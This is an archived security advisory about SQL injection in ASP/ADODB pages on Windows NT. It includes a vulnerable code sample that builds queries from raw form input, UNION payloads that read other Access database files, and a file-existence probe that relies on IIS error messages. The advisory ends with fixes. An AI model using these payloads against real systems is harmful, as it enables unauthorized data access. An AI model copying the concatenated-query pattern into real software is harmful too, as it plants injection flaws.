TUCoPS :: Web :: Apps :: sql4.htm

SQL Security Issues 
Vulnerability

    SQL

Affected

    WinNT

Description

    Jess Lopez de Aguileta found following.  It was tested on

        - WinNT Spanish SP5
        - Data Access 2.1
        - Option Pack 4

    The following SQL works in a ADODB connection inside ASP.   select
    field1,field2  from  table_DSN_DB  where  field1=21  union  select
    address,path from

        \winnt\profiles\administrador\escritorio\report.mdb.scanner

    The first sentence  (on the left-side  from 'union') is  the valid
    query.  A DSN exists and  is pointing the DB containing the  table
    "table_DSN_DB".  But  the second appended  query did not  have any
    DSN pointing to it.  For this example you may use a Retina scanner
    report.  Obviously IUSR_Server must have ACL authorization to  the
    file "report.mdb" for this to work.

    Now thing in a typical code like this:

        set conect_to = Server.CreateObject("ADODB.Connection")
        conect_to.open "validDSN"

        SQLQuery = "select family,description from table where family=" &
        request.form("family_of_item")

        set lot_of_registers=conect_to.execute (SQLQuery)

        do while not lot_of_registers.EOF

            response.write( lot_of_registers.fields("family"))
            response.write( lot_of_registers.fields("description"))
        
            lot_of_registers.movenext
        
        loop

    It would be easy to tweak this query to access any database on the
    NT.  The  standard error report  from the IIS  allows you to  tune
    your query.

    But there is more: you can check for installation of vulnerable
    programs/scripts.  If exists:

        select family,description from table where family=21 union select * from \autoexec.bat.mdb
        
        Microsoft OLE DB Provider for ODBC Drivers error '80004005'
        
        [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
        'C:\AUTOEXEC.BAT'.

    If not exists:

        select family,description from table where family=21 union select * from \other_autoexec.bat.mdb
        
        Microsoft OLE DB Provider for ODBC Drivers error '80004005'
        
        [Microsoft][ODBC Microsoft Access Driver] Could not find file
        'C:\other_autoexec.bat'.

Solution

    - Check the ACL from all your access databases in the NT box.
    - Check  ALL  the  input  from  any  form  that  could be used  to
      construct a SQL query.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH